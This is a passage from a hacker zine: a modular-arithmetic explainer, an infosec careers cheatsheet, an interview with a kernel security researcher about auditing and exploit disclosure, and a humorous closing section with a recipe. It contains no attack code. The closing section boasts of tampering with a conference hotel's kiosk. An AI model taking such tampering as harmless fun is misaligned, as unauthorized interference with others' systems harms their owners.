30 % 11 = 8
30.0/11.0 = 2.727....
Like everything else, those kooky math people just had to have their own notation for remainders as
well.
30 % 11 = 8 is written as:
8 ≡ 30 (mod 11) (where instead of the equal sign having two bars it has 3, can be seen in LaTeX as
\cong)
The above is read as: 8 is congruent to 30 mod 11..
Doing basic operations on congruences is called modular arithmetic.
Randomly, two numbers are "Multiplicative Modular Inverses mod n" of each other if
a*b = 1 (mod n)
One quick example consider 2 (mod 5):
2*3 (mod 5) = 1 (mod 5) (6 / 5 has remainder 1).
This means 2,3 are Multiplicative Modular Inverses of each other mod 5.
The end.
[==================================================================================================]
-=[ 0x0a Information Security Careers Cheatsheet
-=[ Author: Dan Guido
>> Note from GNY Staff:
>> Dan Guido is currently an information security professor at NYU-Poly, and originally wrote this
>> article for the students of his Penetration Testing and Vulnerability Analysis course. It is
>> being republished in GNY Zine with permission in hopes that it may reach a broader audience.
These are my views on careers in information security careers based on the experience I've had and
your mileage may vary. The information below will be most appropriate if you live in New York City,
you're interested in application security, pentesting, or reversing, and you are early on in your
career in information security.
1. Employers
2. Roles
3. Learn from a Book
4. Learn from a Course
5. University
6. Capture the Flag and War Games
7. Communication
8. Meet People
9. Conferences
10. Certifications
11. Links
12. Friends of the Class
1. Employers
=============
As far as I can tell, there are five major employers in the infosec industry (not counting
academia). This section is going to be expanded in a future post.
* The Government
* Non-Tech Fortune 500s (mostly finance)
* Big Tech Vendors (mostly West coast)
* Big Consulting (mostly non-technical)
* Small Consulting (mostly awesome)
The industry you work in will determine the major problems you have to solve. For example, the
emphasis in finance is to reduce risk at the lowest cost to the business (opportunities for large-
scale automation). On the other hand, consulting often means selling people on the idea that X is
actually a vulnerability and researching to find new ones.
2. Roles
=========
I primarily split up infosec jobs into internal network security, product security, and consulting.
I further break down these classes of jobs into the following roles:
* Application Security (code audits/app assessments)
* Attacker (offensive)
* Compliance
* Forensics
* Incident Handler
* Manager
* Network Security Engineer
* Penetration Tester
* Policy
* Researcher
* Reverse Engineer
* Security Architect
The roles above each require a different, highly specialized body of knowledge. This website is a
great resource for application security and penetration testing, but you should find other resources
if you are interested in a different role.
3. Learn from a Book
=====================
Fortunately, there are dozens of good books written about each topic inside information security.
Dino Dai Zovi [1] has an excellent reading list, as does Tom Ptacek [2], and Richard Bejtlich [3]
has recommendations from another perspective (bonus: Richard's book reviews [4] are usually
spot-on). I would personally recommend looking at:
* Gray Hat Hacking [5] (the textbook for this course)
* The Myths of Security [6] (a quick read that covers larger issues)
* Hacking: The Next Generation [7] (a quick read that covers the latest in web security and then
some)
* and any book from O'Reilly on a scripting language of your choice.
If you're not sure what you're looking for, then you should browse the selection offered by
O'Reilly [8] . They are probably the most consistent and high-quality book publisher in this
industry.
Don't forget that reading the book alone won't give you any additional skills beyond the
conversational. You need to practice or create something based on what you read to really gain value
and understanding from it.
4. Learn from a Course
=======================
If you're looking for something more hands-on and directed, there are lots of university courses
about information security available online. I listed some of the best ones that have course
materials available below (ordered by institution name). The RPI course is the most similar to this
one and Hovav gets points for the best academic reading list, but every course on this list is
fantastic.
Course Name Instructor(s) Institution
----------- ------------- -----------
Computer Security [9] Paxson and Wagner Berkeley [10]
Software Security [11] David Brumley CMU [12]
Hacking Exposed [13] Rohyt Belani [14] CMU
Software Security Assessment [15] Gregory Ose DePaul [16]
Intro to Web Application Security [17] Edward Z. Yang [18] MIT IAP 2009 [19]
Intro to Software Exploitation [20] Nathan Rittenhouse MIT IAP 2009
Advanced Vulnerability Assessment Chris Eagle [21] NPS [22]
Secure Software Principles [23] various, see website RPI [24]
Web Programming and Security [25] unknown Stanford [26]
Computer and Network Security [27] unknown Stanford
Advanced Topics in Security [28] Giovanni Vigna [29] UCSB [30]
Computer Security (Graduate) [31] Hovav Shacham [32] UCSD [33]
UNIX Security Holes [34] DJB [35] unknown
Binary Auditing and Reverse Code Engineering [36] unknown University of Bielefeld [37]
Malware Analysis and Antivirus Technologies [38, 39] unknown University of Helsinki [40]
5. University
==============
The easiest shortcut to finding a university with a dedicated security program is to look through
the NSA Centers of Academic Excellence [41] (NSA-CAE) institution list. This certification has
become watered down as more universities have obtained it and it might help to focus your search on
those that have obtained the newer CAE-R certification [42]. Remember, certifications are only a
guideline. You should look into the actual programs at each university instead of basing your
decision on a certification alone.
Once in university, take classes that force you to write code in large volumes to solve hard
problems. IMHO the courses that focus on mainly theoretical or simulated problems provide limited
value. Ask upper level students for recommendations if you can't identify the CS courses with
programming from the CS courses done entirely on paper. The other way to frame this is to go to
school for software development rather than computer science.
6. Capture the Flag and War Games
==================================
If you want to acquire and maintain technical skills and you want to do it fast, play in a CTF or
jump in to a wargame. The one thing to note is that many of these challenges attach themselves to
conferences (of all sizes), and by playing in them you will likely miss the entire rest of the
conference. Try not to over do it, conferences are useful in their own way (see below).
* CSAW CTF [43] (as well as the reversing challenges from 2009 [44])
* UCSB iCTF [45]
* Defcon CTF Pre-qualifications [46]
* wargames at smashthestack.org [47]
* wargames at intruded.net [48]
* calendar of upcoming CTF competitions at [49]
There are some defense-only competitions that disguise themselves as normal CTF competitions, mainly
the Collegiate Cyber Defense Challenge (CCDC) and its regional variations, and you should avoid
them. They are exercises in system administration and frustration and will teach you little about
security or anything else. They are incredibly fun to play as a Red Team though.
7. Communication
=================
In any role, the majority of your time will be spent communicating with others, primarily through
email and meetings and less by phone and IM. The role/employer you have will determine whether you
speak more with internal infosec teams, non-security technologists, or business users. For example,
expect to communicate more with external technologists if you do network security for a financial
firm.
Tips for communicating well in a large organization:
* Learn to write clear, concise, and professional email.
* Learn to get things done [50] and stay organized. Do not drop the ball.
* Learn the business that your company or client is in. If you can speak in terms of the
business, your arguments to a) not do things, b) fix things, and c) do things that involve
time and money will be much more persuasive.
* Learn how your company or client works, i.e., key individuals, processes, or other motivators
that factor into what gets things done.
If you are still attending a university, as with CS courses, take humanities courses that force you
to write.
8. Meet People
===============
* CitySec - informal meetups without presentations, once monthly, occurs in most cities (NYSEC,
google for others) [51]
* OWASP - formal meetups with presentations about web security, usually quarterly (OWASP NY/NJ)
[52, 53]
ISSA [54] and ISC2 focus on policy, compliance and other issues that will be of uncertain use for a
new student in this field. Similarly, InfraGard [55] mainly focuses on law enforcement-related
issues.
9. Conferences
===============
If you've never been to an infosec conference before, use the google calendar below to find a low-
cost local one and go. There have been students of mine who think that attending a conference will
be some kind of test and put off going to one for as long as possible. I promise I won't pop out of
the bushes with a final exam and publish your scores afterward.
* Information Security Conferences Calendar at [56]
If you go to a conference, don't obsess over attending a talk during every time slot. The talks are
just bait to lure all the smart hackers to one location for a weekend: you should meet the other
attendees! If a particular talk was interesting and useful then you can and should talk to the
speaker. This post by Shawn Moyer at the Defcon Speaker's Corner has more on this subject. [57]
If you're working somewhere and are having trouble justifying conference attendance to your company,
the Infosec Leaders blog has some helpful advice. [58]
10. Certifications
===================
This industry requires specialized knowledge and skills, and studying for a certification exam will
not help you gain them. In fact, in many cases, it can be harmful because the time you spend
studying for a test will distract you from doing anything else in this guide.
That said, there are inexpensive and vendor-neutral certifications that you can reasonably obtain
with your current level of experience to help set apart your resume, like the Network+ [59] and
Security+ [60] or even a NOP [61], but I would worry about certifications the least in your job
search or professional development.
In general, the two best reasons to get certifications are:
1. If you are being paid to get certified, through paid training and exams or sometimes through
an automatic pay raise after you get the certification (common in the government).
2. If your company or your client is forcing you to get certified. This is usually to help with a
sales pitch, i.e., "You should hire us because all of our staff are XYZ certified!"
11. Links
==========
* Information Security Leaders Blog
http://www.infosecleaders.com/
* Advice for Computer Science College Students
http://www.joelonsoftware.com/articles/CollegeAdvice.html
* Organizing and Participating in Computer Network Attack and Defense Exercises
http://www.nps.edu/video/portal/Video.aspx?enc=Fvcj9jTKwtwcxg2Wgv3NOEGEdfe6jktD
* Kill Your Idols, Shawn Moyer's reflections on his first years at Defcon
http://defcon.org/html/links/dc-speakerscorner.html
* Reddit comments about this post
http://www.reddit.com/r/netsec/comments/cc4ye/information_security_careers_cheatsheet/
* Hacker News comments about this post
http://news.ycombinator.com/item?id=1409735
* Forensic Engineering: Is It For You?
http://www.todaysengineer.org/2010/Nov/forensic-engineering.asp
* The answer to "Will you mentor me?" is .... no.
http://pindancing.blogspot.com/2010/12/answer-to-will-you-mentor-me-is.html
* My Canons of (ISC)2 Ethics
https://infosecisland.com/blogview/15450-My-Canons-on-ISC-Ethics-Such-as-They-Are.html
* Not a CISSP
http://www.veracode.com/blog/2008/04/not-a-cissp/
* (ISC)2's Newest Cash Cow
http://www.veracode.com/blog/2008/09/isc2s-newest-cash-cow-csslp/
12. Friends of the Class
=========================
* Attack Research
http://www.attackresearch.com/
* Harris: Crucial Security
http://www.govcomm.harris.com/solutions/segments/Cyberspace-Security-Services.asp
* Gotham Digital Science
http://www.gdssecurity.com/
* Intrepidus Group
http://intrepidusgroup.com/
* iSEC Partners
https://www.isecpartners.com/
* MANDIANT
http://www.mandiant.com/
* Matasano Security
http://www.matasano.com/
* TippingPoint DVLabs
http://dvlabs.tippingpoint.com/
* Vulnerability Research Labs
http://www.vrlsec.com/
* zero(day)solutions
http://zerodaysolutions.com/
* ThreatGrid
http://threatgrid.com/
There are a number of internal security and product security teams that I've worked with in the past
who I'm not sure would appreciate being called out like this. Needless to say, there are dozens of
financials, healthcare, and technology companies in NYC that require information security to run
their businesses and they shouldn't be hard to find.
[1] http://www.amazon.com/A-Bug-Hunters-Reading-List/lm/R21POHD6Y2DOLQ
[2] http://www.amazon.com/lm/R2EN4JTQOCHNBA/ref=cm_lm_pthnk_view
[3] http://www.amazon.com/gp/richpub/listmania/byauthor/A2ZVOU9X5W2S47
[4] http://www.amazon.com/gp/cdp/member-reviews/A2ZVOU9X5W2S47/ref=cm_pdp_rev_all
[5] http://www.amazon.com/Gray-Hat-Hacking-Second-Handbook/dp/0071495681
[6] http://www.amazon.com/Myths-Security-Computer-Industry-Doesnt/dp/0596523025
[7] http://www.amazon.com/Hacking-Next-Generation-Animal-Guide/dp/0596154577
[8] http://oreilly.com/pub/topic/security
[9] http://www-inst.eecs.berkeley.edu/~cs161/sp10/
[10] http://berkeley.edu/
[11] http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/
[12] http://www.cmu.edu/index.shtml
[13] http://www.heinz.cmu.edu/academic-resources/course-results/course-details/index.aspx?cid=360
[14] http://www.heinz.cmu.edu/faculty-and-research/faculty-profiles/faculty-details/index.aspx?faculty_id=397
[15] http://www.cdm.depaul.edu/academics/Pages/classinfo.aspx?ofid=992&ClassNbr=35086&Term=20103
[16] http://www.depaul.edu/
[17] http://stuff.mit.edu/iap/2009/websecurity/
[18] http://www.thewritingpot.com/
[19] http://web.mit.edu/
[20] http://stuff.mit.edu/iap/2009/exploit/
[21] http://www.nps.edu/AboutNPS/Centennial/Technology/Notables/ChrisEagle.html
[22] http://www.nps.edu/
[23] http://www.cs.rpi.edu/academics/courses/spring10/csci4971/
[24] http://www.rpi.edu/
[25] http://crypto.stanford.edu/cs142/
[26] http://www.stanford.edu/
[27] http://crypto.stanford.edu/cs155/
[28] http://www.cs.ucsb.edu/~vigna/courses/cs279/
[29] http://www.cs.ucsb.edu/~vigna/
[30] http://www.ucsb.edu/
[31] http://www-cse.ucsd.edu/classes/wi09/cse227/
[32] http://www-cse.ucsd.edu/~hovav/
[33] http://www.ucsd.edu/
[34] http://cr.yp.to/2004-494.html
[35] http://cr.yp.to/
[36] http://thorsten.techfak.uni-bielefeld.de/
[37] http://www.uni-bielefeld.de/International/
[38] https://noppa.tkk.fi/noppa/kurssi/t-110.6220/etusivu
[39] http://www.tml.tkk.fi/Opinnot/T-110.6220/2008/
[40] http://www.helsinki.fi/university/
[41] http://www.nsa.gov/ia/academic_outreach/nat_cae/institutions.shtml
[42] http://www.nsa.gov/ia/academic_outreach/nat_cae/cae_r_program_criteria.shtml
[43] http://www.poly.edu/csaw2011
[44] https://github.com/s7ephen/CSAW_2009
[45] http://ictf.cs.ucsb.edu/
[46] http://www.ddtek.biz/
[47] http://www.smashthestack.org/
[48] http://www.intruded.net/
[49] http://capture.thefl.ag/calendar/
[50] http://www.amazon.com/Getting-Things-Done-Stress-Free-Productivity/dp/0142000280
[51] http://www.sockpuppet.org/nysec/
[52] http://www.owasp.org/index.php/Category:OWASP_Chapter
[53] http://www.owasp.org/index.php/NYNJMetro
[54] https://www.issa.org/Chapters/Chapter-Directory.html
[55] http://www.infragard.net/chapters/index.php?mn=3
[56] http://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc%40group.calendar.google.com
[57] http://defcon.org/html/links/dc-speakerscorner.html#idols-moyer
[58] http://www.infosecleaders.com/2010/03/career-advice-tuesday-making-the-case-for-conference-attendance/
[59] http://www.comptia.org/certifications/listed/network.aspx
[60] http://www.comptia.org/certifications/listed/security.aspx
[61] http://www.immunitysec.com/services-cnop.shtml
[==================================================================================================]
-=[ 0x0b Interview with Dan Rosenberg (bliss)
As a security researcher, what are the most common bugs you find (exploitable or non-exploitable)?
All the old favorites are still very much alive and well. In low-level code, I tend to see a
lot of integer-related issues (signedness bugs, overflow/underflow, etc.), array indexing
problems, and even classic heap or stack buffer overflows. Race conditions and other
filesystem-related issues (such as symlink or hard link problems) are also a favorite bug class
of mine, and it's surprising how frequently they turn up in production code. However, my
favorite vulnerabilities tend to be issues that aren't so easily categorized, such as some of
the more esoteric issues that may occur in kernel code.
Do you commonly use fuzzers when auditing code, or just code review?
It depends on the target. For some targets, such as media players, document viewers, and web
browsers, fuzzing is the easiest way to produce a high volume of exploitable bugs. However, I
tend to personally prefer auditing code for vulnerabilities. Virtually all of my kernel bugs
have been found by auditing code, not fuzzing.
When performing a code review, are there portions of code you generally draw your attention to
first, or is it mostly a free for all?
Definitely. I tend to prefer an auditing strategy where I start looking at a code path at the
moment untrusted user input comes into contact with it, and trace through execution flow from
there to evaluate code that touches that input. As a result, I'll usually start by looking at
the most exposed components of an application or system - code that handles filesystem data,
networking data, system calls if it's a kernel, etc. Other times it's possible to find bugs by
simply looking for vulnerable code constructs regardless of context and determining after-the-
fact if it's possible to trigger that code, but I don't really recommend this for people just
starting out. It's a common beginner mistake to spend a lot of time identifying a piece of code
that looks vulnerable, but turns out to never be triggerable by external input.
Where do you currently work, and what kind of work do you do?
I currently work for VSR, a consultancy in Boston, MA. As part of my job, I deliver a pretty
wide range of security services, including application and network penetration testing, code
review, host hardening, and security training. In addition to my client-facing work, I'm lucky
to have some time to conduct research of my choice.
Outside of the security realm, do you have any other hobbies?
Music is a big part of my life - I play piano, guitar, violin, and whatever else is lying
around. I also enjoy getting outside (gasp!) and lifting heavy things up and down.
Having recently given a kernel hacking talk at DEF CON 19, how do you feel your presentation was
received by the audience, and hacking community as a whole?
I was happy with how the talk was received at the conference. Everyone there seemed genuinely
interested in what I had to say and gave positive feedback, which was nice. I've gotten some
solid constructive criticism since giving the talk, which is important to me, since I consider
the exploit and this research to be work in progress.
When developing your ROSE exploit, how long did it take to go from EIP to shell?
Hmm...well, I do remember that it took me about 15 minutes to go from finding the bug to getting
EIP. The rest of the exploit was *much* more work, due to the potential complexity of kernel
payloads. I think I got my first shell for that exploit about a week or two after I started
working on it, but keep in mind that this was all done in my free time.
What is your opinion on the merit and legitimacy of security certifications?
I think it depends. I'm not certified in anything, and that's never held me back. I don't put
a lot of stock in their value as actual proof of expertise in security, but some companies take
them seriously. If a certification is what distinguishes you from the rest of the pack in the
eyes of a potential employer, then it's probably worth it, but it depends on the company and the
position you're looking at. I would personally rather see demonstrable skills than a piece of
paper, but the industry doesn't necessarily agree.
What do you see as some of the main challenges facing the security industry today (both technical
and non-technical)?
Especially given the recent compromises of Comodo and DigiNotar, solving the problems associated
with SSL (namely the centralized trust placed in CAs) will be a difficult but essential step in
ensuring privacy on the Internet. I don't think this is a problem that's going to go away, so
we've got a lot of work to do as a community.
What do you see as some of the main challenges facing the hacking community today (both technical
and non-technical)?
I'm concerned that the increased media attention towards so-called "hacktivist" organizations
(you know the ones I mean) will cause an increase in government regulation on our ability to
freely access the Internet and other digital services. I think it's critical that everyone
remains aware of these issues, and that the hacking community makes its voices heard by those
seeking to impinge upon the free flow of information.
What is your opinion on the disclosure of vulnerabilities and proof-of-concept exploits? Do you
believe in full disclosure, and should security researchers notify affected vendors prior to their
announcements?
My opinion is that it's a waste of time debating disclosure of vulnerabilities. It's a debate
based almost entirely on feelings and personal values rather than facts. The short version is,
I don't know what the right answer is, and neither does anyone else. My policy is to let people
do what they feel is right with their own bugs, whether that means dropping them to a mailing
list or keeping them private.
As for publishing exploits, I've gone from one end of the spectrum to the other. I think
publishing exploits can be valuable, especially in the face of an unresponsive vendor. I also
think there is value in providing public examples of exploitation techniques to raise awareness
and motivate the develop of practical exploit mitigation technologies. That being said, I've
come to terms with the fact that the publication of weaponized exploits for vulnerabilities in
widely used software directly contributes to real-world exploitation, especially by script
kiddies who wouldn't otherwise have the means. While I've published exploits in the past, my
current opinion is that the cost to innocent users is too high. As a result, my current policy
is to only publish an exploit if I do not think it poses a risk of widespread abuse - recent
examples include my Linux kernel exploits for DEC Alpha and ROSE packet radio. These examples
are useful in that they present new exploitation techniques or provide a vehicle to discuss
topics such as remote kernel exploitation, but they are unlikely to be abused by script kiddies.
Do you have any advice for aspiring hackers and security researchers, regarding education and
gaining experience in the field?
Having an eagerness to learn and being able to conduct self-motivated research are probably the
most important qualities for any aspiring hacker. The amount of freely available learning
material is staggering, and knowing how to properly research a topic is essential to accessing
this wealth of knowledge. If you come across something you're interested in and you don't know
how it works, look it up! None of this stuff is magic, it just takes patience and a willingness
to learn in order to understand. If you can't find a tool to accomplish your goal, write one
yourself. Every project you take on will hopefully teach you something new you can add to your
arsenal.
[==================================================================================================]
-=[ 0x0c Et Cetera, Etc.
-=[ Author: teh crew
For those of you unlucky enough to miss it, the first DerbyCon was a couple of months ago and is
without a doubt one hell of a new addition to the many hacker conferences today. A mix of friendly,
high-profile speakers and a reasonable number of attendees proved to create an intimate conference,
where it was easy to spot and get to know many of the speakers.
On that note, we would like to personally apologize to HD Moore for approaching him, pretending to
be gay, and asking him if he'd like to dance at the Dual Core party. From the bottom of our hearts.
[01:08] * &OrderZero is stuck
[01:09] * &OrderZero in an endless loop of pelvic thrusting
We would also like to apologize to the DerbyCon staff, who expressed their thanks at the closing
ceremony for no one messing with the hotel kiosk. Of course, we immediately headed downstairs and
replaced the airline lookup service with an endless nyan cat. For that, we are also sorry.
Actually, not really, but whatevz.
And with that, we bring you...
,+*^^*+___+++_
,*^^^^ )
_+* ^**+_
+^ _ _++*+_+++_, )
_+^^*+_ ( ,+*^ ^ \+_ )
{ ) ( ,( ,_+--+--, ^) ^\
{ (@) } f ,( ,+-^ __*_*_ ^^\_ ^\ )
{:;-/ (_+*-+^^^^^+*+*<_ _++_)_ ) ) /
( / ( ( ,___ ^*+_+* ) < < \
U _/ ) *--< ) ^\-----++__) ) ) )
( ) _(^)^^)) ) )\^^^^^))^*+/ / /
( / (_))_^)) ) ) ))^^^^^))^^^)__/ +^^
( ,/ (^))^)) ) ) ))^^^^^^^))^^) _)
*+__+* (_))^) ) ) ))^^^^^^))^^^^^)____*^
\ \_)^)_)) ))^^^^^^^^^^))^^^^)
(_ ^\__^^^^^^^^^^^^))^^^^^^^)
^\___ ^\__^^^^^^))^^^^^^^^)\\
^^^^^\uuu/^^\uuu/^^^^\^\^\^\^\^\^\^\
___) >____) >___ ^\_\_\_\_\_\_\)
^^^//\\_^^//\\_^ ^(\_\_\_\)
^^^ ^^ ^^^ ^^
Chupa's Cooking Corner!
In addition to the ingredients on the back of the Nestle chocolate chips bag, you will need:
Nestle chocolate chips (of course)
Grated coconut
Cocoa powder
Wax paper
Powdered sugar or flour
Begin by following the directions on the Nestle chocolate chips bag and making the cookie dough, but
do not put in the chocolate chips. Once formed, mix in cocoa powder until the dough reaches a dark,
even brown.
Next, lay out the wax paper and cover it with a thin layer of flour or powdered sugar. Take some of
the cookie dough and form it into a sheet about 1 cm thick on the wax paper. From here, sprinkle
flour or powdered sugar on top of the dough. On one side of the dough, spread out a good 3 cm-wide
strip of chocolate chips and coconut.
Now, grabbing the wax paper, lift it up and roll the dough onto itself. It should look like a turd.
A delicious turd at that. Place this onto a cookie sheet and cook for as long as the Nestle bag
instructs to, usually 10-15 minutes. Once finished baking, remove and cut into thin slices 2-3 cm
wide. Place onto another cookie sheet and chill in refrigerator until cool.
Then Enjoy. :D
----------------------------------------------------------------------------------------------------
Though, on a serious note, we would like to continue and take this opportunity to raise a worrying
issue we've noticed developing lately in the hacker scene. To put it shortly, the community as a
whole is changing in a counter-productive way. Respected, knowledge-friendly hacker communities
are dropping or going inactive faster than they are being created, and the search for other hackers
truly interested in learning is being overwhelmed by a sea of immature, impressionable teenagers
donning Guy Fawkes masks. The game is no longer about writing quality exploits, or producing
relevant research, or teaching others in a coherent manner, but instead who can post the most
provocative Twitter messages insulting the most people. It's pretty depressing, and quite frankly,
absolutely pathetic.
So, what can you do? Start a community. Publish a magazine. Write a paper.
Teach something.
At the end of the day, that's all that matters.
No matter what you do, keep a level head and remain focused. The hacking scene was founded on a
unique mindset and an unconditional love for technology - don't lose sight of it. If you're in it
for any other reason, then something is seriously wrong. We look forward to seeing your name on the
charlatans page of Attrition.
It's getting late, so let's wrap this up. We're opening the CFP for issue 7, which is scheduled for
release in early 2012. Contact info is in the introduction, and we do respond to every email we
receive.
Stay classy, folks, and hack like it's 1999.
<3, the gny crew
irc.gonullyourself.org +6697 #gny
reddit.com/r/gny
[==================================================================================================]